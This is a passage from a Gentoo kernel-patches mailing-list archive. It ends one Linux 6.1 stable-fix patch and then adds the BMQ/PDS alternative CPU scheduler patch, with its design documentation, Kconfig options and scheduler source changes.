+@@ -2744,6 +2744,15 @@ ssize_t filemap_read(struct kiocb *iocb, struct iov_iter *iter,
+ 			goto put_folios;
+ 		end_offset = min_t(loff_t, isize, iocb->ki_pos + iter->count);
+ 
++		/*
++		 * Pairs with a barrier in
++		 * block_write_end()->mark_buffer_dirty() or other page
++		 * dirtying routines like iomap_write_end() to ensure
++		 * changes to page contents are visible before we see
++		 * increased inode size.
++		 */
++		smp_rmb();
++
+ 		/*
+ 		 * Once we start copying data, we don't want to be touching any
+ 		 * cachelines that might be contended:
+diff --git a/mm/memory-failure.c b/mm/memory-failure.c
+index 99de0328d1bed..ebd717157c813 100644
+--- a/mm/memory-failure.c
++++ b/mm/memory-failure.c
+@@ -1421,7 +1421,7 @@ static bool hwpoison_user_mappings(struct page *p, unsigned long pfn,
+ 	 * This check implies we don't kill processes if their pages
+ 	 * are in the swap cache early. Those are always late kills.
+ 	 */
+-	if (!page_mapped(hpage))
++	if (!page_mapped(p))
+ 		return true;
+ 
+ 	if (PageKsm(p)) {
+@@ -1477,10 +1477,10 @@ static bool hwpoison_user_mappings(struct page *p, unsigned long pfn,
+ 		try_to_unmap(folio, ttu);
+ 	}
+ 
+-	unmap_success = !page_mapped(hpage);
++	unmap_success = !page_mapped(p);
+ 	if (!unmap_success)
+ 		pr_err("%#lx: failed to unmap page (mapcount=%d)\n",
+-		       pfn, page_mapcount(hpage));
++		       pfn, page_mapcount(p));
+ 
+ 	/*
+ 	 * try_to_unmap() might put mlocked page in lru cache, so call
+@@ -1560,7 +1560,7 @@ static void unmap_and_kill(struct list_head *to_kill, unsigned long pfn,
+ 		 * mapping being torn down is communicated in siginfo, see
+ 		 * kill_proc()
+ 		 */
+-		loff_t start = (index << PAGE_SHIFT) & ~(size - 1);
++		loff_t start = ((loff_t)index << PAGE_SHIFT) & ~(size - 1);
+ 
+ 		unmap_mapping_range(mapping, start, size, 0);
+ 	}
+diff --git a/mm/migrate.c b/mm/migrate.c
+index 9372a826e6d08..91bd69c61148e 100644
+--- a/mm/migrate.c
++++ b/mm/migrate.c
+@@ -388,6 +388,7 @@ int folio_migrate_mapping(struct address_space *mapping,
+ 	int dirty;
+ 	int expected_count = folio_expected_refs(mapping, folio) + extra_count;
+ 	long nr = folio_nr_pages(folio);
++	long entries, i;
+ 
+ 	if (!mapping) {
+ 		/* Anonymous page without mapping */
+@@ -425,8 +426,10 @@ int folio_migrate_mapping(struct address_space *mapping,
+ 			folio_set_swapcache(newfolio);
+ 			newfolio->private = folio_get_private(folio);
+ 		}
++		entries = nr;
+ 	} else {
+ 		VM_BUG_ON_FOLIO(folio_test_swapcache(folio), folio);
++		entries = 1;
+ 	}
+ 
+ 	/* Move dirty while page refs frozen and newpage not yet exposed */
+@@ -436,7 +439,11 @@ int folio_migrate_mapping(struct address_space *mapping,
+ 		folio_set_dirty(newfolio);
+ 	}
+ 
+-	xas_store(&xas, newfolio);
++	/* Swap cache still stores N entries instead of a high-order entry */
++	for (i = 0; i < entries; i++) {
++		xas_store(&xas, newfolio);
++		xas_next(&xas);
++	}
+ 
+ 	/*
+ 	 * Drop cache reference from old page by unfreezing
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 05fa5141af516..3d6ebb9877a4e 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -9480,7 +9480,7 @@ static void nft_set_commit_update(struct list_head *set_update_list)
+ 	list_for_each_entry_safe(set, next, set_update_list, pending_update) {
+ 		list_del_init(&set->pending_update);
+ 
+-		if (!set->ops->commit)
++		if (!set->ops->commit || set->dead)
+ 			continue;
+ 
+ 		set->ops->commit(set);


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-01-04 16:10 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-01-04 16:10 UTC (permalink / raw
  To: gentoo-commits

commit:     1eee8df6811822b2ae677d513b5002832503e6e5
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Jan  4 16:10:10 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Jan  4 16:10:10 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=1eee8df6

Add BMQ(BitMap Queue) Scheduler, USE=experimental

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                 |     4 +
 5020_BMQ-and-PDS-io-scheduler-v6.1-r1.patch | 10236 ++++++++++++++++++++++++++
 2 files changed, 10240 insertions(+)

diff --git a/0000_README b/0000_README
index f806635e..9c608802 100644
--- a/0000_README
+++ b/0000_README
@@ -382,3 +382,7 @@ Desc:   Kernel fs for Linux that provides easier uid/gid-shifting for containers
 Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.
+
+Patch:  5020_BMQ-and-PDS-io-scheduler-v6.1-r1.patch
+From:   https://gitlab.com/alfredchen/projectc
+Desc:   BMQ(BitMap Queue) Scheduler. A new CPU scheduler developed from PDS(incld). Inspired by the scheduler in zircon.

diff --git a/5020_BMQ-and-PDS-io-scheduler-v6.1-r1.patch b/5020_BMQ-and-PDS-io-scheduler-v6.1-r1.patch
new file mode 100644
index 00000000..882261ca
--- /dev/null
+++ b/5020_BMQ-and-PDS-io-scheduler-v6.1-r1.patch
@@ -0,0 +1,10236 @@
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 42af9ca0127e..31747ec54f9d 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -5406,6 +5406,12 @@
+ 	sa1100ir	[NET]
+ 			See drivers/net/irda/sa1100_ir.c.
+
++	sched_timeslice=
++			[KNL] Time slice in ms for Project C BMQ/PDS scheduler.
++			Format: integer 2, 4
++			Default: 4
++			See Documentation/scheduler/sched-BMQ.txt
++
+ 	sched_verbose	[KNL] Enables verbose scheduler debug messages.
+
+ 	schedstats=	[KNL,X86] Enable or disable scheduled statistics.
+diff --git a/Documentation/admin-guide/sysctl/kernel.rst b/Documentation/admin-guide/sysctl/kernel.rst
+index 98d1b198b2b4..d7c78a107f93 100644
+--- a/Documentation/admin-guide/sysctl/kernel.rst
++++ b/Documentation/admin-guide/sysctl/kernel.rst
+@@ -1552,3 +1552,13 @@ is 10 seconds.
+
+ The softlockup threshold is (``2 * watchdog_thresh``). Setting this
+ tunable to zero will disable lockup detection altogether.
++
++yield_type:
++===========
++
++BMQ/PDS CPU scheduler only. This determines what type of yield calls
++to sched_yield will perform.
++
++  0 - No yield.
++  1 - Deboost and requeue task. (default)
++  2 - Set run queue skip task.
+diff --git a/Documentation/scheduler/sched-BMQ.txt b/Documentation/scheduler/sched-BMQ.txt
+new file mode 100644
+index 000000000000..05c84eec0f31
+--- /dev/null
++++ b/Documentation/scheduler/sched-BMQ.txt
+@@ -0,0 +1,110 @@
++                         BitMap queue CPU Scheduler
++                         --------------------------
++
++CONTENT
++========
++
++ Background
++ Design
++   Overview
++   Task policy
++   Priority management
++   BitMap Queue
++   CPU Assignment and Migration
++
++
++Background
++==========
++
++BitMap Queue CPU scheduler, referred to as BMQ from here on, is an evolution
++of previous Priority and Deadline based Skiplist multiple queue scheduler(PDS),
++and inspired by Zircon scheduler. The goal of it is to keep the scheduler code
++simple, while efficiency and scalable for interactive tasks, such as desktop,
++movie playback and gaming etc.
++
++Design
++======
++
++Overview
++--------
++
++BMQ use per CPU run queue design, each CPU(logical) has it's own run queue,
++each CPU is responsible for scheduling the tasks that are putting into it's
++run queue.
++
++The run queue is a set of priority queues. Note that these queues are fifo
++queue for non-rt tasks or priority queue for rt tasks in data structure. See
++BitMap Queue below for details. BMQ is optimized for non-rt tasks in the fact
++that most applications are non-rt tasks. No matter the queue is fifo or
++priority, In each queue is an ordered list of runnable tasks awaiting execution
++and the data structures are the same. When it is time for a new task to run,
++the scheduler simply looks the lowest numbered queueue that contains a task,
++and runs the first task from the head of that queue. And per CPU idle task is
++also in the run queue, so the scheduler can always find a task to run on from
++its run queue.
++
++Each task will assigned the same timeslice(default 4ms) when it is picked to
++start running. Task will be reinserted at the end of the appropriate priority
++queue when it uses its whole timeslice. When the scheduler selects a new task
++from the priority queue it sets the CPU's preemption timer for the remainder of
++the previous timeslice. When that timer fires the scheduler will stop execution
++on that task, select another task and start over again.
++
++If a task blocks waiting for a shared resource then it's taken out of its
++priority queue and is placed in a wait queue for the shared resource. When it
++is unblocked it will be reinserted in the appropriate priority queue of an
++eligible CPU.
++
++Task policy
++-----------
++
++BMQ supports DEADLINE, FIFO, RR, NORMAL, BATCH and IDLE task policy like the
++mainline CFS scheduler. But BMQ is heavy optimized for non-rt task, that's
++NORMAL/BATCH/IDLE policy tasks. Below is the implementation detail of each
++policy.
++
++DEADLINE
++	It is squashed as priority 0 FIFO task.
++
++FIFO/RR
++	All RT tasks share one single priority queue in BMQ run queue designed. The
++complexity of insert operation is O(n). BMQ is not designed for system runs
++with major rt policy tasks.
++
++NORMAL/BATCH/IDLE
++	BATCH and IDLE tasks are treated as the same policy. They compete CPU with
++NORMAL policy tasks, but they just don't boost. To control the priority of
++NORMAL/BATCH/IDLE tasks, simply use nice level.
++
++ISO
++	ISO policy is not supported in BMQ. Please use nice level -20 NORMAL policy
++task instead.
++
++Priority management
++-------------------
++
++RT tasks have priority from 0-99. For non-rt tasks, there are three different
++factors used to determine the effective priority of a task. The effective
++priority being what is used to determine which queue it will be in.
++
++The first factor is simply the task’s static priority. Which is assigned from
++task's nice level, within [-20, 19] in userland's point of view and [0, 39]
++internally.
++
++The second factor is the priority boost. This is a value bounded between
++[-MAX_PRIORITY_ADJ, MAX_PRIORITY_ADJ] used to offset the base priority, it is
++modified by the following cases:
++
++*When a thread has used up its entire timeslice, always deboost its boost by
++increasing by one.
++*When a thread gives up cpu control(voluntary or non-voluntary) to reschedule,
++and its switch-in time(time after last switch and run) below the thredhold
++based on its priority boost, will boost its boost by decreasing by one buti is
++capped at 0 (won’t go negative).
++
++The intent in this system is to ensure that interactive threads are serviced
++quickly. These are usually the threads that interact directly with the user
++and cause user-perceivable latency. These threads usually do little work and
++spend most of their time blocked awaiting another user event. So they get the
++priority boost from unblocking while background threads that do most of the
++processing receive the priority penalty for using their entire timeslice.
+diff --git a/fs/proc/base.c b/fs/proc/base.c
+index 9e479d7d202b..2a8530021b23 100644
+--- a/fs/proc/base.c
++++ b/fs/proc/base.c
+@@ -479,7 +479,7 @@ static int proc_pid_schedstat(struct seq_file *m, struct pid_namespace *ns,
+ 		seq_puts(m, "0 0 0\n");
+ 	else
+ 		seq_printf(m, "%llu %llu %lu\n",
+-		   (unsigned long long)task->se.sum_exec_runtime,
++		   (unsigned long long)tsk_seruntime(task),
+ 		   (unsigned long long)task->sched_info.run_delay,
+ 		   task->sched_info.pcount);
+
+diff --git a/include/asm-generic/resource.h b/include/asm-generic/resource.h
+index 8874f681b056..59eb72bf7d5f 100644
+--- a/include/asm-generic/resource.h
++++ b/include/asm-generic/resource.h
+@@ -23,7 +23,7 @@
+ 	[RLIMIT_LOCKS]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
+ 	[RLIMIT_SIGPENDING]	= { 		0,	       0 },	\
+ 	[RLIMIT_MSGQUEUE]	= {   MQ_BYTES_MAX,   MQ_BYTES_MAX },	\
+-	[RLIMIT_NICE]		= { 0, 0 },				\
++	[RLIMIT_NICE]		= { 30, 30 },				\
+ 	[RLIMIT_RTPRIO]		= { 0, 0 },				\
+ 	[RLIMIT_RTTIME]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
+ }
+diff --git a/include/linux/sched.h b/include/linux/sched.h
+index ffb6eb55cd13..2e730a59caa2 100644
+--- a/include/linux/sched.h
++++ b/include/linux/sched.h
+@@ -762,8 +762,14 @@ struct task_struct {
+ 	unsigned int			ptrace;
+
+ #ifdef CONFIG_SMP
+-	int				on_cpu;
+ 	struct __call_single_node	wake_entry;
++#endif
++#if defined(CONFIG_SMP) || defined(CONFIG_SCHED_ALT)
++	int				on_cpu;
++#endif
++
++#ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ 	unsigned int			wakee_flips;
+ 	unsigned long			wakee_flip_decay_ts;
+ 	struct task_struct		*last_wakee;
+@@ -777,6 +783,7 @@ struct task_struct {
+ 	 */
+ 	int				recent_used_cpu;
+ 	int				wake_cpu;
++#endif /* !CONFIG_SCHED_ALT */
+ #endif
+ 	int				on_rq;
+
+@@ -785,6 +792,20 @@ struct task_struct {
+ 	int				normal_prio;
+ 	unsigned int			rt_priority;
+
++#ifdef CONFIG_SCHED_ALT
++	u64				last_ran;
++	s64				time_slice;
++	int				sq_idx;
++	struct list_head		sq_node;
++#ifdef CONFIG_SCHED_BMQ
++	int				boost_prio;
++#endif /* CONFIG_SCHED_BMQ */
++#ifdef CONFIG_SCHED_PDS
++	u64				deadline;
++#endif /* CONFIG_SCHED_PDS */
++	/* sched_clock time spent running */
++	u64				sched_time;
++#else /* !CONFIG_SCHED_ALT */
+ 	struct sched_entity		se;
+ 	struct sched_rt_entity		rt;
+ 	struct sched_dl_entity		dl;
+@@ -795,6 +816,7 @@ struct task_struct {
+ 	unsigned long			core_cookie;
+ 	unsigned int			core_occupation;
+ #endif
++#endif /* !CONFIG_SCHED_ALT */
+
+ #ifdef CONFIG_CGROUP_SCHED
+ 	struct task_group		*sched_task_group;
+@@ -1545,6 +1567,15 @@ struct task_struct {
+ 	 */
+ };
+
++#ifdef CONFIG_SCHED_ALT
++#define tsk_seruntime(t)		((t)->sched_time)
++/* replace the uncertian rt_timeout with 0UL */
++#define tsk_rttimeout(t)		(0UL)
++#else /* CFS */
++#define tsk_seruntime(t)	((t)->se.sum_exec_runtime)
++#define tsk_rttimeout(t)	((t)->rt.timeout)
++#endif /* !CONFIG_SCHED_ALT */
++
+ static inline struct pid *task_pid(struct task_struct *task)
+ {
+ 	return task->thread_pid;
+diff --git a/include/linux/sched/deadline.h b/include/linux/sched/deadline.h
+index 7c83d4d5a971..fa30f98cb2be 100644
+--- a/include/linux/sched/deadline.h
++++ b/include/linux/sched/deadline.h
+@@ -1,5 +1,24 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
+
++#ifdef CONFIG_SCHED_ALT
++
++static inline int dl_task(struct task_struct *p)
++{
++	return 0;
++}
++
++#ifdef CONFIG_SCHED_BMQ
++#define __tsk_deadline(p)	(0UL)
++#endif
++
++#ifdef CONFIG_SCHED_PDS
++#define __tsk_deadline(p)	((((u64) ((p)->prio))<<56) | (p)->deadline)
++#endif
++
++#else
++
++#define __tsk_deadline(p)	((p)->dl.deadline)
++
+ /*
+  * SCHED_DEADLINE tasks has negative priorities, reflecting
+  * the fact that any of them has higher prio than RT and
+@@ -21,6 +40,7 @@ static inline int dl_task(struct task_struct *p)
+ {
+ 	return dl_prio(p->prio);
+ }
++#endif /* CONFIG_SCHED_ALT */
+
+ static inline bool dl_time_before(u64 a, u64 b)
+ {
+diff --git a/include/linux/sched/prio.h b/include/linux/sched/prio.h
+index ab83d85e1183..6af9ae681116 100644
+--- a/include/linux/sched/prio.h
++++ b/include/linux/sched/prio.h
+@@ -18,6 +18,32 @@
+ #define MAX_PRIO		(MAX_RT_PRIO + NICE_WIDTH)
+ #define DEFAULT_PRIO		(MAX_RT_PRIO + NICE_WIDTH / 2)
+
++#ifdef CONFIG_SCHED_ALT
++
++/* Undefine MAX_PRIO and DEFAULT_PRIO */
++#undef MAX_PRIO
++#undef DEFAULT_PRIO
++
++/* +/- priority levels from the base priority */
++#ifdef CONFIG_SCHED_BMQ
++#define MAX_PRIORITY_ADJ	(7)
++
++#define MIN_NORMAL_PRIO		(MAX_RT_PRIO)
++#define MAX_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH)
++#define DEFAULT_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH / 2)
++#endif
++
++#ifdef CONFIG_SCHED_PDS
++#define MAX_PRIORITY_ADJ	(0)
++
++#define MIN_NORMAL_PRIO		(128)
++#define NORMAL_PRIO_NUM		(64)
++#define MAX_PRIO		(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM)
++#define DEFAULT_PRIO		(MAX_PRIO - NICE_WIDTH / 2)
++#endif
++
++#endif /* CONFIG_SCHED_ALT */
++
+ /*
+  * Convert user-nice values [ -20 ... 0 ... 19 ]
+  * to static priority [ MAX_RT_PRIO..MAX_PRIO-1 ],
+diff --git a/include/linux/sched/rt.h b/include/linux/sched/rt.h
+index 994c25640e15..8c050a59ece1 100644
+--- a/include/linux/sched/rt.h
++++ b/include/linux/sched/rt.h
+@@ -24,8 +24,10 @@ static inline bool task_is_realtime(struct task_struct *tsk)
+
+ 	if (policy == SCHED_FIFO || policy == SCHED_RR)
+ 		return true;
++#ifndef CONFIG_SCHED_ALT
+ 	if (policy == SCHED_DEADLINE)
+ 		return true;
++#endif
+ 	return false;
+ }
+
+diff --git a/include/linux/sched/topology.h b/include/linux/sched/topology.h
+index 816df6cc444e..c8da08e18c91 100644
+--- a/include/linux/sched/topology.h
++++ b/include/linux/sched/topology.h
+@@ -234,7 +234,8 @@ static inline bool cpus_share_cache(int this_cpu, int that_cpu)
+
+ #endif	/* !CONFIG_SMP */
+
+-#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL)
++#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL) && \
++	!defined(CONFIG_SCHED_ALT)
+ extern void rebuild_sched_domains_energy(void);
+ #else
+ static inline void rebuild_sched_domains_energy(void)
+diff --git a/init/Kconfig b/init/Kconfig
+index 94125d3b6893..c87ba766d354 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -819,6 +819,7 @@ menu "Scheduler features"
+ config UCLAMP_TASK
+ 	bool "Enable utilization clamping for RT/FAIR tasks"
+ 	depends on CPU_FREQ_GOV_SCHEDUTIL
++	depends on !SCHED_ALT
+ 	help
+ 	  This feature enables the scheduler to track the clamped utilization
+ 	  of each CPU based on RUNNABLE tasks scheduled on that CPU.
+@@ -865,6 +866,35 @@ config UCLAMP_BUCKETS_COUNT
+
+ 	  If in doubt, use the default value.
+
++menuconfig SCHED_ALT
++	bool "Alternative CPU Schedulers"
++	default y
++	help
++	  This feature enable alternative CPU scheduler"
++
++if SCHED_ALT
++
++choice
++	prompt "Alternative CPU Scheduler"
++	default SCHED_BMQ
++
++config SCHED_BMQ
++	bool "BMQ CPU scheduler"
++	help
++	  The BitMap Queue CPU scheduler for excellent interactivity and
++	  responsiveness on the desktop and solid scalability on normal
++	  hardware and commodity servers.
++
++config SCHED_PDS
++	bool "PDS CPU scheduler"
++	help
++	  The Priority and Deadline based Skip list multiple queue CPU
++	  Scheduler.
++
++endchoice
++
++endif
++
+ endmenu
+
+ #
+@@ -918,6 +948,7 @@ config NUMA_BALANCING
+ 	depends on ARCH_SUPPORTS_NUMA_BALANCING
+ 	depends on !ARCH_WANT_NUMA_VARIABLE_LOCALITY
+ 	depends on SMP && NUMA && MIGRATION && !PREEMPT_RT
++	depends on !SCHED_ALT
+ 	help
+ 	  This option adds support for automatic NUMA aware memory/task placement.
+ 	  The mechanism is quite primitive and is based on migrating memory when
+@@ -1015,6 +1046,7 @@ config FAIR_GROUP_SCHED
+ 	depends on CGROUP_SCHED
+ 	default CGROUP_SCHED
+
++if !SCHED_ALT
+ config CFS_BANDWIDTH
+ 	bool "CPU bandwidth provisioning for FAIR_GROUP_SCHED"
+ 	depends on FAIR_GROUP_SCHED
+@@ -1037,6 +1069,7 @@ config RT_GROUP_SCHED
+ 	  realtime bandwidth for them.
+ 	  See Documentation/scheduler/sched-rt-group.rst for more information.
+
++endif #!SCHED_ALT
+ endif #CGROUP_SCHED
+
+ config UCLAMP_TASK_GROUP
+@@ -1281,6 +1314,7 @@ config CHECKPOINT_RESTORE
+
+ config SCHED_AUTOGROUP
+ 	bool "Automatic process group scheduling"
++	depends on !SCHED_ALT
+ 	select CGROUPS
+ 	select CGROUP_SCHED
+ 	select FAIR_GROUP_SCHED
+diff --git a/init/init_task.c b/init/init_task.c
+index ff6c4b9bfe6b..19e9c662d1a1 100644
+--- a/init/init_task.c
++++ b/init/init_task.c
+@@ -75,9 +75,15 @@ struct task_struct init_task
+ 	.stack		= init_stack,
+ 	.usage		= REFCOUNT_INIT(2),
+ 	.flags		= PF_KTHREAD,
++#ifdef CONFIG_SCHED_ALT
++	.prio		= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
++	.static_prio	= DEFAULT_PRIO,
++	.normal_prio	= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
++#else
+ 	.prio		= MAX_PRIO - 20,
+ 	.static_prio	= MAX_PRIO - 20,
+ 	.normal_prio	= MAX_PRIO - 20,
++#endif
+ 	.policy		= SCHED_NORMAL,
+ 	.cpus_ptr	= &init_task.cpus_mask,
+ 	.user_cpus_ptr	= NULL,
+@@ -88,6 +94,17 @@ struct task_struct init_task
+ 	.restart_block	= {
+ 		.fn = do_no_restart_syscall,
+ 	},
++#ifdef CONFIG_SCHED_ALT
++	.sq_node	= LIST_HEAD_INIT(init_task.sq_node),
++#ifdef CONFIG_SCHED_BMQ
++	.boost_prio	= 0,
++	.sq_idx		= 15,
++#endif
++#ifdef CONFIG_SCHED_PDS
++	.deadline	= 0,
++#endif
++	.time_slice	= HZ,
++#else
+ 	.se		= {
+ 		.group_node 	= LIST_HEAD_INIT(init_task.se.group_node),
+ 	},
+@@ -95,6 +112,7 @@ struct task_struct init_task
+ 		.run_list	= LIST_HEAD_INIT(init_task.rt.run_list),
+ 		.time_slice	= RR_TIMESLICE,
+ 	},
++#endif
+ 	.tasks		= LIST_HEAD_INIT(init_task.tasks),
+ #ifdef CONFIG_SMP
+ 	.pushable_tasks	= PLIST_NODE_INIT(init_task.pushable_tasks, MAX_PRIO),
+diff --git a/kernel/Kconfig.preempt b/kernel/Kconfig.preempt
+index c2f1fd95a821..41654679b1b2 100644
+--- a/kernel/Kconfig.preempt
++++ b/kernel/Kconfig.preempt
+@@ -117,7 +117,7 @@ config PREEMPT_DYNAMIC
+
+ config SCHED_CORE
+ 	bool "Core Scheduling for SMT"
+-	depends on SCHED_SMT
++	depends on SCHED_SMT && !SCHED_ALT
+ 	help
+ 	  This option permits Core Scheduling, a means of coordinated task
+ 	  selection across SMT siblings. When enabled -- see
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index b474289c15b8..a23224b45b03 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -787,7 +787,7 @@ static int validate_change(struct cpuset *cur, struct cpuset *trial)
+ 	return ret;
+ }
+
+-#ifdef CONFIG_SMP
++#if defined(CONFIG_SMP) && !defined(CONFIG_SCHED_ALT)
+ /*
+  * Helper routine for generate_sched_domains().
+  * Do cpusets a, b have overlapping effective cpus_allowed masks?
+@@ -1183,7 +1183,7 @@ static void rebuild_sched_domains_locked(void)
+ 	/* Have scheduler rebuild the domains */
+ 	partition_and_rebuild_sched_domains(ndoms, doms, attr);
+ }
+-#else /* !CONFIG_SMP */
++#else /* !CONFIG_SMP || CONFIG_SCHED_ALT */
+ static void rebuild_sched_domains_locked(void)
+ {
+ }
+diff --git a/kernel/delayacct.c b/kernel/delayacct.c
+index e39cb696cfbd..463423572e09 100644
+--- a/kernel/delayacct.c
++++ b/kernel/delayacct.c
+@@ -150,7 +150,7 @@ int delayacct_add_tsk(struct taskstats *d, struct task_struct *tsk)
+ 	 */
+ 	t1 = tsk->sched_info.pcount;
+ 	t2 = tsk->sched_info.run_delay;
+-	t3 = tsk->se.sum_exec_runtime;
++	t3 = tsk_seruntime(tsk);
+
+ 	d->cpu_count += t1;
+
+diff --git a/kernel/exit.c b/kernel/exit.c
+index 35e0a31a0315..64e368441cf4 100644
+--- a/kernel/exit.c
++++ b/kernel/exit.c
+@@ -125,7 +125,7 @@ static void __exit_signal(struct task_struct *tsk)
+ 			sig->curr_target = next_thread(tsk);
+ 	}
+
+-	add_device_randomness((const void*) &tsk->se.sum_exec_runtime,
++	add_device_randomness((const void*) &tsk_seruntime(tsk),
+ 			      sizeof(unsigned long long));
+
+ 	/*
+@@ -146,7 +146,7 @@ static void __exit_signal(struct task_struct *tsk)
+ 	sig->inblock += task_io_get_inblock(tsk);
+ 	sig->oublock += task_io_get_oublock(tsk);
+ 	task_io_accounting_add(&sig->ioac, &tsk->ioac);
+-	sig->sum_sched_runtime += tsk->se.sum_exec_runtime;
++	sig->sum_sched_runtime += tsk_seruntime(tsk);
+ 	sig->nr_threads--;
+ 	__unhash_process(tsk, group_dead);
+ 	write_sequnlock(&sig->stats_lock);
+diff --git a/kernel/locking/rtmutex.c b/kernel/locking/rtmutex.c
+index 7779ee8abc2a..5b9893cdfb1b 100644
+--- a/kernel/locking/rtmutex.c
++++ b/kernel/locking/rtmutex.c
+@@ -343,7 +343,7 @@ waiter_update_prio(struct rt_mutex_waite
+ 	lockdep_assert(RB_EMPTY_NODE(&waiter->tree.entry));
+ 
+ 	waiter->tree.prio = __waiter_prio(task);
+-	waiter->tree.deadline = task->dl.deadline;
++	waiter->tree.deadline = __tsk_deadline(task);
+ }
+ 
+ /*
+@@ -364,16 +364,20 @@ waiter_clone_prio(struct rt_mutex_waiter
+  * Only use with rt_waiter_node_{less,equal}()
+  */
+ #define task_to_waiter_node(p)	\
+-	&(struct rt_waiter_node){ .prio = __waiter_prio(p), .deadline = (p)->dl.deadline }
++	&(struct rt_waiter_node){ .prio = __waiter_prio(p), .deadline = __tsk_deadline(p) }
+ #define task_to_waiter(p)	\
+ 	&(struct rt_mutex_waiter){ .tree = *task_to_waiter_node(p) }
+ 
+ static __always_inline int rt_waiter_node_less(struct rt_waiter_node *left,
+ 					       struct rt_waiter_node *right)
+ {
++#ifdef CONFIG_SCHED_PDS
++	return (left->deadline < right->deadline);
++#else
+ 	if (left->prio < right->prio)
+ 		return 1;
+ 
++#ifndef CONFIG_SCHED_BMQ
+ 	/*
+ 	 * If both waiters have dl_prio(), we check the deadlines of the
+ 	 * associated tasks.
+@@ -382,16 +386,22 @@ static __always_inline int rt_waiter_nod
+ 	 */
+ 	if (dl_prio(left->prio))
+ 		return dl_time_before(left->deadline, right->deadline);
++#endif
+ 
+ 	return 0;
++#endif
+ }
+ 
+ static __always_inline int rt_waiter_node_equal(struct rt_waiter_node *left,
+ 						 struct rt_waiter_node *right)
+ {
++#ifdef CONFIG_SCHED_PDS
++	return (left->deadline == right->deadline);
++#else
+ 	if (left->prio != right->prio)
+ 		return 0;
+ 
++#ifndef CONFIG_SCHED_BMQ
+ 	/*
+ 	 * If both waiters have dl_prio(), we check the deadlines of the
+ 	 * associated tasks.
+@@ -400,8 +410,10 @@ static __always_inline int rt_waiter_nod
+ 	 */
+ 	if (dl_prio(left->prio))
+ 		return left->deadline == right->deadline;
++#endif
+ 
+ 	return 1;
++#endif
+ }
+ 
+ static inline bool rt_mutex_steal(struct rt_mutex_waiter *waiter,
+diff --git a/kernel/sched/Makefile b/kernel/sched/Makefile
+index 976092b7bd45..31d587c16ec1 100644
+--- a/kernel/sched/Makefile
++++ b/kernel/sched/Makefile
+@@ -28,7 +28,12 @@ endif
+ # These compilation units have roughly the same size and complexity - so their
+ # build parallelizes well and finishes roughly at once:
+ #
++ifdef CONFIG_SCHED_ALT
++obj-y += alt_core.o
++obj-$(CONFIG_SCHED_DEBUG) += alt_debug.o
++else
+ obj-y += core.o
+ obj-y += fair.o
++endif
+ obj-y += build_policy.o
+ obj-y += build_utility.o
+diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
+new file mode 100644
+index 000000000000..572eab74418f
+--- /dev/null
++++ b/kernel/sched/alt_core.c
+@@ -0,0 +1,7961 @@
++/*
++ *  kernel/sched/alt_core.c
++ *
++ *  Core alternative kernel scheduler code and related syscalls
++ *
++ *  Copyright (C) 1991-2002  Linus Torvalds
++ *
++ *  2009-08-13	Brainfuck deadline scheduling policy by Con Kolivas deletes
++ *		a whole lot of those previous things.
++ *  2017-09-06	Priority and Deadline based Skip list multiple queue kernel
++ *		scheduler by Alfred Chen.
++ *  2019-02-20	BMQ(BitMap Queue) kernel scheduler by Alfred Chen.
++ */
++#include <linux/sched/cputime.h>
++#include <linux/sched/debug.h>
++#include <linux/sched/isolation.h>
++#include <linux/sched/loadavg.h>
++#include <linux/sched/mm.h>
++#include <linux/sched/nohz.h>
++#include <linux/sched/stat.h>
++#include <linux/sched/wake_q.h>
++
++#include <linux/blkdev.h>
++#include <linux/context_tracking.h>
++#include <linux/cpuset.h>
++#include <linux/delayacct.h>
++#include <linux/init_task.h>
++#include <linux/kcov.h>
++#include <linux/kprobes.h>
++#include <linux/profile.h>
++#include <linux/nmi.h>
++#include <linux/scs.h>
++
++#include <uapi/linux/sched/types.h>
++
++#include <asm/irq_regs.h>
++#include <asm/switch_to.h>
++
++#define CREATE_TRACE_POINTS
++#include <trace/events/sched.h>
++#undef CREATE_TRACE_POINTS
++
++#include "sched.h"
++
++#include "pelt.h"
++
++#include "../../io_uring/io-wq.h"
++#include "../smpboot.h"
++
++/*
++ * Export tracepoints that act as a bare tracehook (ie: have no trace event
++ * associated with them) to allow external modules to probe them.
++ */
++EXPORT_TRACEPOINT_SYMBOL_GPL(pelt_irq_tp);
++
++#ifdef CONFIG_SCHED_DEBUG
++#define sched_feat(x)	(1)
++/*
